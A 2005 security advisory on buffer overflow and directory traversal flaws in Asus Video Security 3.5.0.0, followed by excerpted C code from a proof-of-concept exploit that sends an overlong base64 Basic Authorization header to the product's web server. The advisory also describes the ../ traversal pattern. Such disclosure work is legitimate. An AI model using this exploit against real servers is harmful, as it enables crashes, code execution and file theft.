Asus Video Security Multiple Vulnerabilities (Buffer Overflow, Directory Traversal)
3 Nov. 2005
Summary
"VideoSecurity Online provides you with various security monitoring modes."
Asus Video Security does not validate user provided input properly allowing attackers to execute arbitrary code using a buffer overflow, and directory traversal vulnerability.
Vulnerable Systems:
* Asus Video Security version 3.5.0.0 and prior
Asus Video Security is a monitoring software bundled with Asus graphic cards. By default the built-in web server is disabled so these bugs can be exploited "only" if it has been manually activated.
Buffer Overflow:
Authorization buffer overflow that happens during the handling of the decoded (base64) username:password string sent to a password protected ASUS Video Security web server.
The server is not vulnerable unless authorization is in use.
Directory Traversal:
The built-in web server is also vulnerable to a classical directory traversal bug which allows an attacker to download any file in the disk where the program is installed.
That's possible through the usage of the dot-dot-slash (../) and backslash (..\) patterns (HTTP encoded chars are not allowed in the web server).
If the server is protected with password the attacker must know the right keyword.
fputs("\n"
"ASUS Video Security <= 3.5.0.0 HTTP multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attack:\n"
"1 = authorization buffer-overflow, works only if server uses password\n"
"2 = directory traversal, if the server uses a password you must know it\n"
"\n", argv[0], port);
exit(1);
}
attack = atoi(argv[1]);
if(argc > 3) port = atoi(argv[3]);
p = strstr(buff, "\r\n\r\n");
if(p) *p = 0;
if(strstr(buff, "Authenticate")) {
auth = 1;
fputs("- server uses password\n", stdout);
}
*uri = 0;
*more = 0;
switch(attack) {
case 1: {
if(!auth) {
printf(" Alert: the server doesn't use password so is not vulnerable to this attack\n");
}
memset(buff, 'A', BOFSZ);
len = BOFSZ;
b64 = base64_encode(buff, &len);
sprintf(more, "Authorization: Basic %s\r\n", b64);
free(b64);
} break;
